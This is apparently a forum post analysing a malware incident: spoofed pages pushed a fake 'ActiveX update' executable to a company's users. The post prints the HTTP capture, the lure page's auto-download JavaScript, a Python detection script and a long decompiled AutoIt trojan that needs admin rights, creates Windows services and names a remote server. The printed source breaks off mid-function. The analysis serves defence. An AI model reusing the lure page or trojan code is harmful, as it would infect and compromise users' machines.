I was called in to solve connectivity problems at a company in the region.
It didn't take me long to spot the problem: there was an error message and a download whenever large websites, such as Google, were accessed.
A page was displayed, coming from the IP address 190.120.227.114. The server was running Apache 2.2.14 on Ubuntu 4.15.
A message asked to update ActiveX, and it appeared in every browser.
However, when I tried to run a Google search using Chrome's "type in the address bar" search feature, it returned a 404 error saying that Google was using Apache and Ubuntu.
Google sanitizes its error pages and uses a web server called GWS (Google WebServer, a build of Apache itself). That was definitely not Google.
I thought of several things, some kind of spoofing, but the problem didn't occur on other machines on the same network.
So I decided to download the supposed "ActiveX updater" file that the message suggested.
It was in a directory called "app", and it was an executable. When I tried to access a possible Apache index of the "app" directory, it returned a 500 error (Internal Server Error). Possibly a badly written .htaccess.
Fine. Once the file was downloaded, it had the default icon of [link visible only to registered forum users].
I know that AutoIt, when the AutoItWrapper is not installed and configured, leaves the version of the language used in its compiled files. Currently we are on version 3-point-something. That file was written in version 1.0.0.2.
Source code of the downloaded file:
IP information
Owner information
I contacted the web host via chat:
As soon as I have time I'll send this e-mail and study this source code better, along with a way to remove it. I'll also be sending it to AV researchers.
From a quick look, it seems to be a trojan, or a botnet server, that notifies the remote server, but the code is heavily obfuscated and tiring to read.
You can download the full source code of the virus, as well as the binaries, [link visible only to registered forum users]. Don't run the files if you don't know what you're doing.
Code (HTTP exchange captured while requesting www.google.com.br):
Send: Return Code: 0x00000000
GET / HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: pt-br
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: www.google.com.br
Connection: Keep-Alive

Receive: Return Code: 0x00000000
HTTP/1.1 200 OK
Date: Thu, 12 Jul 2012 19:05:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.15
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 378
Connection: close
Content-Type: text/html

Receive: Return Code: 0x00000000
00000000  1F 8B 08 00 00 00 00 00 00 03 85 50 5F 4B E3 40  ...........P_K.@
00000010  10 7F 36 9F 62 BA 4F 0A 26 63 11 A1 B5 49 E1 2E  .6.b.O.&c...I..
00000020  2D 28 A8 57 24 D2 BB 27 19 93 B5 5D 49 77 E3 EE  -(.W$..'...]Iw..
00000030  A4 89 CA 7D DA 7B B8 AF E1 A6 A9 E0 81 70 4F 3B  ...}.{.......pO;
00000040  3B FC FE 4E 3C 98 FD 48 B3 5F 8B 39 AC 79 53 C2  ;..N<..H._.9.yS.
00000050  E2 EE FB D5 65 0A 22 44 5C 9E A6 88 B3 6C 06 3F  ....e."D\....l.?
00000060  2F B2 EB 2B 18 46 27 90 59 D2 4E B1 32 9A 4A C4  /..+.F'.Y.N.2.J.
00000070  F9 8D 00 B1 66 AE CE 11 9B A6 89 9A D3 C8 D8 15  ....f...........
00000080  66 B7 D8 76 5A C3 8E BC 1F 43 FE C4 8C 0A 2E C4  f..vZ....C......
00000090  34 88 77 86 ED A6 D4 2E F9 42 66 38 1E 8F 7B F6  4.w......Bf8..{.
000000A0  0E 2B A9 F0 CF 46 32 41 87 0D E5 73 AD B6 89 48  .+...F2A...s...H
000000B0  8D 66 A9 39 CC 5E 2A 29 20 EF 7F 89 60 D9 32 76  .f.9.^*) ..`.2v
000000C0  DC 09 E4 6B B2 4E 72 A2 9C 09 47 A3 B3 71 38 14  ...k.Nr...G..q8.
000000D0  80 5E 8A 15 97 72 FA 2D 67 B5 95 2D 2C 95 2E 4C  .^...r.-g..-,..L
000000E0  E3 60 26 1D 71 4D A5 7A A5 C2 C4 D8 83 82 D8 E5  .`&.qM.z........
000000F0  56 55 0C EC 5D F6 E2 4F B4 A5 7E EB E3 3D D6 3A  VU..]..O..~..=.:
00000100  EF BA 41 5D 15 C4 F2 F0 08 DE 82 03 2A A5 E5 43  ..A]........*..C
00000110  31 B7 D6 80 A6 2E DB A3 5A D5 96 FE FE 31 50 74  1.......Z....1Pt
00000120  AB AD 5C 79 13 7B 0C 4A 3B F6 68 30 40 55 A9 72  ..\y.{.J;.h0@U.r
00000130  F2 91 3C 44 C2 47 12 CF 18 88 A3 49 70 D0 EC 52  ..<D.G.....Ip..R
00000140  46 A5 E9 30 DE 2E 01 81 54 55 98 9A CD DA 38 BE  F..0....TU....8.
00000150  F7 73 24 5B 29 26 C1 EF 20 C6 3E 9E 4F 8F FB EB  .s$[)&.. .>.O...
00000160  3D 98 E2 E5 FF 65 3E 3A 4C FE 91 D8 73 77 47 9D  =....e>:L...swG.
00000170  BE 03 69 12 CF 7B 35 02 00 00                    ..i..{5...
HTML code (the page that was returned):
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Activex Windows Desatualizado</title>
<script type="text/javascript">
function update() {
    alert("Erro na configuração do navegador, instale o aplicativo de atualização!");
    window.location = "/app/Comhost_app.exe";
}
</script>
</head>
<body>
<script type="text/javascript">
update();
</script>
</body>
</html>
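The two things the author spotted by eye (a Google hostname answered by an Apache/PHP banner, and a page whose only job is to send the browser to an .exe) can be checked mechanically from the capture above. The following Python is an added example, not code from the original post: it rebuilds the gzip body from the hex dump, checks it against the declared Content-Length and the gzip trailer, inflates it if the transcription is intact, and scans the result for a redirect to an executable. The header lines and hex rows are transcribed from the post; the EXPECTED_SERVER table and the finding labels are my own assumptions.

```python
import gzip
import re
import struct
import zlib

# Headers transcribed from the capture in the post (only the lines the checks use).
REQUEST_HEADERS = """GET / HTTP/1.1
Accept-Encoding: gzip, deflate
Host: www.google.com.br"""

RESPONSE_HEADERS = """HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Content-Encoding: gzip
Content-Length: 378"""

# Hex dump of the response body as shown in the post (ASCII gutter omitted).
HEX_DUMP = """
00000000 1F 8B 08 00 00 00 00 00 00 03 85 50 5F 4B E3 40
00000010 10 7F 36 9F 62 BA 4F 0A 26 63 11 A1 B5 49 E1 2E
00000020 2D 28 A8 57 24 D2 BB 27 19 93 B5 5D 49 77 E3 EE
00000030 A4 89 CA 7D DA 7B B8 AF E1 A6 A9 E0 81 70 4F 3B
00000040 3B FC FE 4E 3C 98 FD 48 B3 5F 8B 39 AC 79 53 C2
00000050 E2 EE FB D5 65 0A 22 44 5C 9E A6 88 B3 6C 06 3F
00000060 2F B2 EB 2B 18 46 27 90 59 D2 4E B1 32 9A 4A C4
00000070 F9 8D 00 B1 66 AE CE 11 9B A6 89 9A D3 C8 D8 15
00000080 66 B7 D8 76 5A C3 8E BC 1F 43 FE C4 8C 0A 2E C4
00000090 34 88 77 86 ED A6 D4 2E F9 42 66 38 1E 8F 7B F6
000000A0 0E 2B A9 F0 CF 46 32 41 87 0D E5 73 AD B6 89 48
000000B0 8D 66 A9 39 CC 5E 2A 29 20 EF 7F 89 60 D9 32 76
000000C0 DC 09 E4 6B B2 4E 72 A2 9C 09 47 A3 B3 71 38 14
000000D0 80 5E 8A 15 97 72 FA 2D 67 B5 95 2D 2C 95 2E 4C
000000E0 E3 60 26 1D 71 4D A5 7A A5 C2 C4 D8 83 82 D8 E5
000000F0 56 55 0C EC 5D F6 E2 4F B4 A5 7E EB E3 3D D6 3A
00000100 EF BA 41 5D 15 C4 F2 F0 08 DE 82 03 2A A5 E5 43
00000110 31 B7 D6 80 A6 2E DB A3 5A D5 96 FE FE 31 50 74
00000120 AB AD 5C 79 13 7B 0C 4A 3B F6 68 30 40 55 A9 72
00000130 F2 91 3C 44 C2 47 12 CF 18 88 A3 49 70 D0 EC 52
00000140 46 A5 E9 30 DE 2E 01 81 54 55 98 9A CD DA 38 BE
00000150 F7 73 24 5B 29 26 C1 EF 20 C6 3E 9E 4F 8F FB EB
00000160 3D 98 E2 E5 FF 65 3E 3A 4C FE 91 D8 73 77 47 9D
00000170 BE 03 69 12 CF 7B 35 02 00 00
"""

# Assumed allow-list: the Server banner a well-known host is expected to send.
# Google's front end identifies itself as "gws", which is the author's tell.
EXPECTED_SERVER = {"www.google.com.br": "gws", "www.google.com": "gws"}


def parse_headers(block):
    """Lower-cased header name -> value; the request/status line is skipped."""
    headers = {}
    for line in block.splitlines()[1:]:
        name, _, value = line.partition(":")
        if value:
            headers[name.strip().lower()] = value.strip()
    return headers


def hexdump_to_bytes(dump):
    """Rebuild raw bytes from 'offset xx xx ...' rows; a trailing ASCII gutter is ignored."""
    row = re.compile(r"^[0-9A-Fa-f]{8}((?:\s+[0-9A-Fa-f]{2}){1,16})")
    out = bytearray()
    for line in dump.strip().splitlines():
        m = row.match(line.strip())
        if m:
            out.extend(int(tok, 16) for tok in m.group(1).split())
    return bytes(out)


def gzip_trailer(body):
    """(crc32, isize) from the 8-byte gzip trailer, readable even if inflating fails."""
    return struct.unpack("<II", body[-8:])


def decompress_body(body):
    """gunzip, or None if the stream is damaged (a transcription typo surfaces here)."""
    try:
        return gzip.decompress(body).decode("latin-1")
    except (OSError, EOFError, zlib.error):
        return None


def suspicious_indicators(req_block, resp_block, body):
    """'label: detail' findings for one request/response pair."""
    req, resp = parse_headers(req_block), parse_headers(resp_block)
    host, server = req.get("host", ""), resp.get("server", "")
    findings = []
    expected = EXPECTED_SERVER.get(host)
    if expected and not server.lower().startswith(expected):
        findings.append(f"server-mismatch: {host} answered with Server: {server}")
    if int(resp.get("content-length", "-1")) != len(body):
        findings.append(f"length-mismatch: Content-Length disagrees with body of {len(body)} bytes")
    if resp.get("content-encoding", "").lower() == "gzip":
        html = decompress_body(body) if body[:2] == b"\x1f\x8b" else None
        if html is None:
            findings.append("body-undecodable: gzip declared but the body does not inflate")
        for target in re.findall(r"""window\.location\s*=\s*["']([^"']+)""", html or ""):
            if target.lower().endswith(".exe"):
                findings.append(f"auto-download: page sends the browser to {target}")
    return findings


BODY = hexdump_to_bytes(HEX_DUMP)
```

Running `suspicious_indicators(REQUEST_HEADERS, RESPONSE_HEADERS, BODY)` reports the server mismatch straight from the headers; the trailer of the rebuilt body claims 565 bytes of uncompressed HTML, consistent with the page shown above, and if the dump inflates cleanly the redirect to `/app/Comhost_app.exe` is reported as well.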
Code (decompiled AutoIt source of the downloaded file):
#NoTrayIcon
#RequireAdmin
Global $Var0001 = "auto_7"
Global $Var0002 = "Auto 7"
Global $Var0003 = "gb_service.exe"
Global $Var0004 = "http://190.120.227.114"
Global Const $Var0005 = "ServicesActive"
Global Const $Var0006 = 0x00010000
Global Const $Var0007 = 0x00020000
Global Const $Var0008 = 0x00040000
Global Const $Var0009 = 0x00080000
Global Const $Var0010 = BitOR($Var0006, $Var0007, $Var0008, $Var0009)
Global Const $Var0011 = 1
Global Const $Var0012 = 2
Global Const $Var0013 = 1
Global Const $Var0014 = 0x00000010
Global Const $Var0015 = 0x00000020
Global Const $Var0016 = 0x00000080
Global Const $Var0017 = 0x000f01ff
Global Const $Var0018 = 1
Global Const $Var0019 = 2
Global Const $Var0020 = 3
Global Const $Var0021 = 4
Global Const $Var0022 = 14
Global Const $Var0023 = 1
Global Const $Var0024 = 2
Global Const $Var0025 = 3
Global Const $Var0026 = 4
Global Const $Var0027 = 5
Global Const $Var0028 = 6
Global Const $Var0029 = 7
Global Const $Var0030 = 8
Global Const $Var0031 = 9
Global Const $Var0032 = 1
Global Const $Var0033 = 2
Global Const $Var0034 = 4
Global Const $Var0035 = 8
Global Const $Var0036 = BitOR($Var0032, $Var0033, $Var0035)
Global Const $Var0037 = 0x00000010
Global Const $Var0038 = 0x00000020
Global Const $Var0039 = BitOR($Var0037, $Var0038)
Global Const $Var0040 = 0x00000100
Global Const $Var0041 = BitOR($Var0039, $Var0034, $Var0036, $Var0040)
Global Const $Var0042 = 2
Global Const $Var0043 = 0
Global Const $Var0044 = 1
Global Const $Var0045 = 2
Global Const $Var0046 = 3
Global Const $Var0047 = 4
Global Const $Var0048 = 7
Global Const $Var0049 = 1
Global Const $Var0050 = 0x00000080
Global Const $Var0051 = 1
Global Const $Var0052 = 2
Global Const $Var0053 = BitOR($Var0051, $Var0052)
Global Const $Var0054 = 0x00000078
Global Const $Var0055 = 0
Global $Var0056, $Var0057, $Var0058, $Var0059, $Var0060 = False
Global $Var0061 = DllStructCreate("dword dwServiceType;" & "dword dwCurrentState;dword dwControlsAccepted;dword dwWin32ExitCode;" & "dword dwServiceSpecificExitCode;dword dwCheckPoint;dword dwWaitHint")
Global $Var0062
Global $Var0063
Global $Var0064
Global $Var0065 = 1
Global $Var0066 = DllOpen("advapi32.dll")
Global $Var0067
Global $Var0068 = "SessionChange" & "_" & @MDAY & "." & @MON & "." & @YEAR & " _ " & @HOUR & "." & @MIN & "." & @SEC & ".log"
Global $Var0069 = RegRead("HKEY_LOCAL_MACHINE\Software\SessionChange", "LogfilePath")
Global $Var0070 = FileOpen($Var0069 & "\" & $Var0068, 1)
Fn0001("", 1)
Func Fn0001($__01, $__02 = 0, $__03 = 0)
    Dim $a57c0301d0f[12]
    $a57c0301d0f[0] = "January"
    $a57c0301d0f[1] = "February"
    $a57c0301d0f[2] = "March"
    $a57c0301d0f[3] = "April"
    $a57c0301d0f[4] = "May"
    $a57c0301d0f[5] = "June"
    $a57c0301d0f[6] = "July"
    $a57c0301d0f[7] = "August"
    $a57c0301d0f[8] = "September"
    $a57c0301d0f[9] = "October"
    $a57c0301d0f[10] = "November"
    $a57c0301d0f[11] = "December"
    If @HOUR > 12 Then
        $a05d0f01132 = @HOUR - 12
        $a47e020130c = " PM"
    Else
        $a05d0f01132 = @HOUR
        $a47e020130c = " AM"
    EndIf
    If $__02 = 1 Then
        Local $locVar0001 = "Log created: " & $a57c0301d0f[@MON - 1] & " " & @MDAY & ", " & @YEAR & " : " & $a05d0f01132 & ":" & @MIN & ":" & @SEC & $a47e020130c
        Fn0002(StringLen($locVar0001), "_")
        FileWriteLine($Var0070, $locVar0001)
        Fn0002(StringLen($locVar0001), "_")
        FileWriteLine($Var0070, @CRLF & @CRLF)
    Else
        Local $locVar0001 = ""
        For $a26f0801633 = 1 To $__03
            $locVar0001 = $locVar0001 & @CRLF
        Next
        $locVar0001 = $locVar0001 & $a57c0301d0f[@MON - 1] & " " & @MDAY & ", " & @YEAR & " : " & $a05d0f01132 & ":" & @MIN & ":" & @SEC & $a47e020130c & " [" & @AutoItPID & "] >> " & $__01
        FileWriteLine($Var0070, $locVar0001)
    EndIf
EndFunc
Func Fn0002($__01, $__02)
    Local $locVar0001 = ""
    For $a26f0801633 = 1 To $__01
        $locVar0001 = $locVar0001 & $__02
    Next
    FileWriteLine($Var0070, $locVar0001)
EndFunc
Global Const $Var0071 = "struct;long X;long Y;endstruct"
Global Const $Var0072 = "struct;long Left;long Top;long Right;long Bottom;endstruct"
Global Const $Var0073 = "struct;word Year;word Month;word Dow;word Day;word Hour;word Minute;word Second;word MSeconds;endstruct"
Global Const $Var0074 = "struct;hwnd hWndFrom;uint_ptr IDFrom;INT Code;endstruct"
Global Const $Var0075 = "uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;int SelectedImage;int OverlayImage;" & "int Indent;lparam Param"
Global Const $Var0076 = $Var0074 & ";uint Mask;int_ptr Item;ptr Text;int TextMax;int Image;" & "int SelectedImage;int OverlayImage;int Indent;lparam Param"
Global Const $Var0077 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;" & "word MinSecond;word MinMSecond;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;" & "word MaxMinute;word MaxSecond;word MaxMSecond;bool MinValid;bool MaxValid"
Global Const $Var0078 = "dword Length;dword Reserved;dword RecordNumber;dword TimeGenerated;dword TimeWritten;dword EventID;" & "word EventType;word NumStrings;word EventCategory;word ReservedFlags;dword ClVar0255ingRecordNumber;dword StringOffset;" & "dword UserSidLength;dword UserSidOffset;dword DataLength;dword DataOffset"
Global Const $Var0079 = "byte CLSID[16];byte FormatID[16];ptr CodecName;ptr DllName;ptr FormatDesc;ptr FileExt;" & "ptr MimeType;dword Flags;dword Version;dword SigCount;dword SigSize;ptr SigPattern;ptr SigMask"
Global Const $Var0080 = "struct;uint Mask;int Item;int SubItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;lparam Param;" & "int Indent;int GroupID;uint Columns;ptr pColumns;ptr piColFmt;int iGroup;endstruct"
Global Const $Var0081 = $Var0074 & ";int Item;int SubItem;uint NewState;uint OldState;uint Changed;" & "struct;long ActionX;long ActionY;endstruct;lparam Param"
Global Const $Var0082 = "struct;" & $Var0074 & ";dword dwDrawStage;handle hdc;" & $Var0072 & ";dword_ptr dwItemSpec;uint uItemState;lparam lItemlParam;endstruct" & ";dword clrText;dword clrTextBk;int iSubItem;dword dwItemType;dword clrFace;int iIconEffect;" & "int iIconPhase;int iPartId;int iStateId;struct;long TextLeft;long TextTop;long TextRight;long TextBottom;endstruct;uint uAlign"
Global Const $Var0083 = $Var0074 & ";int Index;int SubItem;uint NewState;uint OldState;uint Changed;" & $Var0071 & ";lparam lParam;uint KeyFlags"
Global Const $Var0084 = "uint Size;" & $Var0071 & ";uint Hit;" & $Var0073 & ";" & $Var0072 & ";int iOffset;int iRow;int iCol"
Global Const $Var0085 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short Span"
Global Const $Var0086 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds;short MinSet;short MaxSet"
Global Const $Var0087 = "word MinYear;word MinMonth;word MinDOW;word MinDay;word MinHour;word MinMinute;word MinSecond;" & "word MinMSeconds;word MaxYear;word MaxMonth;word MaxDOW;word MaxDay;word MaxHour;word MaxMinute;word MaxSecond;" & "word MaxMSeconds"
Global Const $Var0088 = $Var0074 & ";struct;word BegYear;word BegMonth;word BegDOW;word BegDay;word BegHour;word BegMinute;word BegSecond;word BegMSeconds;endstruct;" & "struct;word EndYear;word EndMonth;word EndDOW;word EndDay;word EndHour;word EndMinute;word EndSecond;word EndMSeconds;endstruct"
Global Const $Var0089 = "struct;uint Mask;handle hItem;uint State;uint StateMask;ptr Text;int TextMax;int Image;int SelectedImage;" & "int Children;lparam Param;endstruct"
Global Const $Var0090 = $Var0074 & ";uint Action;" & "struct;uint OldMask;handle OldhItem;uint OldState;uint OldStateMask;" & "ptr OldText;int OldTextMax;int OldImage;int OldSelectedImage;int OldChildren;lparam OldParam;endstruct;" & "struct;uint NewMask;handle NewhItem;uint NewState;uint NewStateMask;" & "ptr NewText;int NewTextMax;int NewImage;int NewSelectedImage;int NewChildren;lparam NewParam;endstruct;" & "struct;long PointX;long PointY;endstruct"
Global Const $Var0091 = "struct;" & $Var0074 & ";dword DrawStage;handle HDC;" & $Var0072 & ";dword_ptr ItemSpec;uint ItemState;lparam ItemParam;endstruct" & ";dword ClrText;dword ClrTextBk;int Level"
Global Const $Var0092 = "uint Size;uint Mask;uint Type;uint State;uint ID;handle SubMenu;handle BmpChecked;handle BmpUnchecked;" & "ulong_ptr ItemData;ptr TypeData;uint CCH;handle BmpItem"
Global Const $Var0093 = "uint cbSize;uint fMask;uint fStyle;dword clrFore;dword clrBack;ptr lpText;uint cch;" & "int iImage;hwnd hwndChild;uint cxMinChild;uint cyMinChild;uint cx;handle hbmBack;uint wID;uint cyChild;uint cyMaxChild;" & "uint cyIntegral;uint cxIdeal;lparam lParam;uint cxHeader;" & $Var0072 & ";uint uChevronState"
Global Const $Var0094 = $Var0074 & ";bool fChanged;" & "struct;long TargetLeft;long TargetTop;long TargetRight;long TargetBottom;endstruct;" & "struct;long ActualLeft;long ActualTop;long ActualRight;long ActualBottom;endstruct"
Global Const $Var0095 = $Var0074 & ";uint uBand;uint wID;" & "struct;long CLeft;long CTop;long CRight;long CBottom;endstruct;" & "struct;long BLeft;long BTop;long BRight;long BBottom;endstruct"
Global Const $Var0096 = $Var0074 & ";int iItem;" & "struct;int iBitmap;int idCommand;byte fsState;byte fsStyle;dword_ptr dwData;int_ptr iString;endstruct" & ";int cchText;ptr pszText;" & $Var0072
Global Const $Var0097 = "dword StructSize;hwnd hwndOwner;handle hInstance;ptr lpstrFilter;ptr lpstrCustomFilter;" & "dword nMaxCustFilter;dword nFilterIndex;ptr lpstrFile;dword nMaxFile;ptr lpstrFileTitle;dword nMaxFileTitle;" & "ptr lpstrInitialDir;ptr lpstrTitle;dword Flags;word nFileOffset;word nFileExtension;ptr lpstrDefExt;lparam lCustData;" & "ptr lpfnHook;ptr lpTemplateName;ptr pvReserved;dword dwReserved;dword FlagsEx"
Global Const $Var0098 = "struct;dword Size;long Width;long Height;word Planes;word BitCount;dword Compression;dword SizeImage;" & "long XPelsPerMeter;long YPelsPerMeter;dword ClrUsed;dword ClrImportant;endstruct;dword RGBQuad"
Global Const $Var0099 = "dword cbSize;" & $Var0072 & ";int dxyLineButton;int xyThumbTop;" & "int xyThumbBottom;int reserved;dword rgstate[6]"
Global Const $Var0100 = "long Height;long Width;long Escapement;long Orientation;long Weight;byte Italic;byte Underline;" & "byte Strikeout;byte CharSet;byte OutPrecision;byte ClipPrecision;byte Quality;byte PitchAndFamily;wchar FaceName[32]"
Global Const $Var0101 = "dword Size;ptr Reserved1;ptr Desktop;ptr Title;dword X;dword Y;dword XSize;dword YSize;dword XCountChars;" & "dword YCountChars;dword FillAttribute;dword Flags;word ShowWindow;word Reserved2;ptr Reserved3;handle StdInput;" & "handle StdOutput;handle StdError"
Global Const $Var0102 = "dword Length;ptr Descriptor;bool InheritHandle"
Global Const $Var0103 = "long tmHeight;long tmAscent;long tmDescent;long tmInternalLeading;long tmExternalLeading;" & "long tmAveCharWidth;long tmMaxCharWidth;long tmWeight;long tmOverhang;long tmDigitizedAspectX;long tmDigitizedAspectY;" & "wchar tmFirstChar;wchar tmLastChar;wchar tmDefaultChar;wchar tmBreakChar;byte tmItalic;byte tmUnderlined;byte tmStruckOut;" & "byte tmPitchAndFamily;byte tmCharSet"
Global Const $Var0104 = 0x00020000
Global Const $Var0105 = 0x000f0000
Global Const $Var0106 = $Var0104
Global Const $Var0107 = $Var0104
Global Const $Var0108 = 0x001f0000
Func Fn0003($__01 = @error, $__02 = @extended)
    Local $locVar0001 = DllCall("kernel32.dll", "dword", "GetLastError")
    Return SetError($__01, $__02, $locVar0001[0])
EndFunc
Global Const $Var0109 = Ptr(-1)
Global Const $Var0110 = Ptr(-1)
Global Const $Var0111 = 0x00000100
Global Const $Var0112 = 0x00002000
Global Const $Var0113 = 0x00008000
Global Const $Var0114 = BitShift($Var0111, 8)
Global Const $Var0115 = BitShift($Var0112, 8)
Global Const $Var0116 = BitShift($Var0113, 8)
Global Const $Var0117 = "dword Length;dword MemoryLoad;" & "uint64 TotalPhys;uint64 AvailPhys;uint64 TotalPageFile;uint64 AvailPageFile;" & "uint64 TotalVirtual;uint64 AvailVirtual;uint64 AvailExtendedVirtual"
Func Fn0004($__01 = 0, $__02 = True, $__03 = True, $__04 = "")
    Local $locVar0001 = "wstr"
    If $__04 = "" Then
        $__04 = 0
        $locVar0001 = "ptr"
    EndIf
    Local $locVar0002 = DllCall("kernel32.dll", "handle", "CreateEventW", "ptr", $__01, "bool", $__02, "bool", $__03, $locVar0001, $__04)
    If @error Then Return SetError(@error, @extended, 0)
    Return $locVar0002[0]
EndFunc
Func Fn0005($__01)
    Local $locVar0001 = DllCall("kernel32.dll", "bool", "SetEvent", "handle", $__01)
    If @error Then Return SetError(@error, @extended, False)
    Return $locVar0001[0]
EndFunc
Func Fn0006($__01, $__02, $__03, $__04, $__05, $__06, $__07 = Default, $__08 = Default, $__09 = Default, $__10 = Default, $__11 = Default, $__12 = "")
    Local $locVar0001, $locVar0002, $locVar0003, $locVar0004, $locVar0005, $locVar0006, $locVar0007, $locVar0008
    $locVar0001 = DllStructCreate("wchar[" & Number($__07 <> Default) * (StringLen($__07) + 1) & "]")
    DllStructSetData($locVar0001, 1, $__07)
    $locVar0002 = DllStructCreate("dword[" & Number($__08) & "]")
    If IsArray($__09) Then
        Local $locVar0009, $locVar0010
        $locVar0009 = UBound($__09) - 1
        For $a2fd190023a = 0 To $locVar0009
            $locVar0010 &= "wchar[" & StringLen($__09[$a2fd190023a]) + 1 & "];"
        Next
        $locVar0003 = DllStructCreate(StringTrimRight($locVar0010, 1))
        For $a2fd190023a = 0 To $locVar0009
            DllStructSetData($locVar0003, $a2fd190023a + 1, $__09[$a2fd190023a])
        Next
    Else
        $locVar0003 = DllStructCreate("wchar[" & Number($__09 <> Default) * (StringLen($__09) + 1) & "]")
        DllStructSetData($locVar0003, 1, $__09)
    EndIf
    $locVar0004 = DllStructCreate("wchar[" & Number($__10 <> Default) * (StringLen($__10) + 1) & "]")
    DllStructSetData($locVar0004, 1, $__10)
    $locVar0005 = DllStructCreate("wchar[" & Number($__11 <> Default) * (StringLen($__11) + 1) & "]")
    DllStructSetData($locVar0005, 1, $__11)
    $locVar0006 = Fn0014($__12, $Var0012)
    $locVar0007 = DllCall($Var0066, "ptr", "CreateServiceW", "ptr", $locVar0006, "wstr", $__01, "wstr", $__02, "dword", $Var0017, "dword", $__03, "dword", $__04, "dword", $__05, "wstr", $__06, "ptr", DllStructGetPtr($locVar0001), "ptr", DllStructGetPtr($locVar0002), "ptr", DllStructGetPtr($locVar0003), "ptr", DllStructGetPtr($locVar0004), "ptr", DllStructGetPtr($locVar0005))
    If $locVar0007[0] = 0 Then
        $locVar0008 = Fn0003()
    Else
        Fn0012($locVar0007[0])
    EndIf
    Fn0012($locVar0006)
    Return SetError($locVar0008, DllStructGetData($locVar0002, 1), Number($locVar0007[0] <> 0))
EndFunc
Func Fn0007($__01, $__02 = "")
    Local $locVar0001, $locVar0002, $locVar0003, $locVar0004
    $locVar0001 = Fn0014($__02, $Var0011)
    $locVar0002 = Fn0015($locVar0001, $__01, $Var0006)
    $locVar0003 = DllCall($Var0066, "int", "DeleteService", "ptr", $locVar0002)
    If $locVar0003[0] = 0 Then $locVar0004 = Fn0003()
    Fn0012($locVar0002)
    Fn0012($locVar0001)
    Return SetError($locVar0004, 0, $locVar0003[0])
EndFunc
Func Fn0008($__01, $__02 = "")
    Local $locVar0001, $locVar0002
    $locVar0001 = Fn0014($__02, $Var0011)
    $locVar0002 = Fn0015($locVar0001, $__01, $Var0016)
    Fn0012($locVar0002)
    Fn0012($locVar0001)
    Return Number($locVar0002 <> 0)
EndFunc
Func Fn0009($__01, $__02 = "")
    Local $locVar0001, $locVar0002, $locVar0003, $locVar0004, $locVar0005, $locVar0006, $locVar0007
    $locVar0001 = Fn0014($__02, $Var0011)
    $locVar0002 = Fn0015($locVar0001, $__01, $Var0013)
    $locVar0003 = Fn0016($locVar0002, 0, 0)
    $locVar0004 = DllStructCreate("ubyte[" & $locVar0003[4] & "]")
    $locVar0005 = Fn0016($locVar0002, DllStructGetPtr($locVar0004), DllStructGetSize($locVar0004))
    If $locVar0005[0] = 0 Then $locVar0006 = Fn0003()
    Fn0012($locVar0002)
    Fn0012($locVar0001)
    $locVar0007 = DllStructCreate("dword[3];uint_ptr[2];dword;uint_ptr[3]", $locVar0005[2])
    Return SetError($locVar0006, 0, DllStructGetData($locVar0007, 1, 1))
EndFunc
Func Fn0010($__01, $__02 = "")
    Local $locVar0001, $locVar0002, $locVar0003, $locVar0004
    $locVar0001 = Fn0014($__02, $Var0011)
    $locVar0002 = Fn0015($locVar0001, $__01, $Var0014)
    $locVar0003 = DllCall($Var0066, "int", "StartServiceW", "ptr", $locVar0002, "dword", 0, "ptr", 0)
    If $locVar0003[0] = 0 Then $locVar0004 = Fn0003()
    Fn0012($locVar0002)
    Fn0012($locVar0001)
    Return SetError($locVar0004, 0, $locVar0003[0])
EndFunc
Func Fn0011($__01, $__02 = "")
    Local $locVar0001, $locVar0002, $locVar0003, $locVar0004
    $locVar0001 = Fn0014($__02, $Var0011)
    $locVar0002 = Fn0015($locVar0001, $__01, $Var0015)
    $locVar0003 = Fn0013($locVar0002, $Var0018)
    If $locVar0003 = 0 Then $locVar0004 = Fn0003()
    Fn0012($locVar0002)
    Fn0012($locVar0001)
    Return SetError($locVar0004, 0, $locVar0003)
EndFunc
Func Fn0012($__01)
    Local $locVar0001 = DllCall($Var0066, "int", "ClVar0255eServiceHandle", "ptr", $__01)
    If @error Then Return SetError(@error, 0, 0)
    Return $locVar0001[0]
EndFunc
Func Fn0013($__01, $__02)
    Local $locVar0001 = DllCall($Var0066, "int", "ControlService", "ptr", $__01, "dword", $__02, "ptr*", 0)
    If @error Then Return SetError(@error, 0, 0)
    Return $locVar0001[0]
EndFunc
Func Fn0014($__01, $__02)
    Local $locVar0001 = DllCall($Var0066, "ptr", "OpenSCManagerW", "wstr", $__01, "wstr", $Var0005, "dword", $__02)
    If @error Then Return SetError(@error, 0, 0)
    Return $locVar0001[0]
EndFunc
Func Fn0015($__01, $__02, $__03)
    Local $locVar0001 = DllCall($Var0066, "ptr", "OpenServiceW", "ptr", $__01, "wstr", $__02, "dword", $__03)
    If @error Then Return SetError(@error, 0, 0)
    Return $locVar0001[0]
EndFunc
Func Fn0016($__01, $__02, $__03)
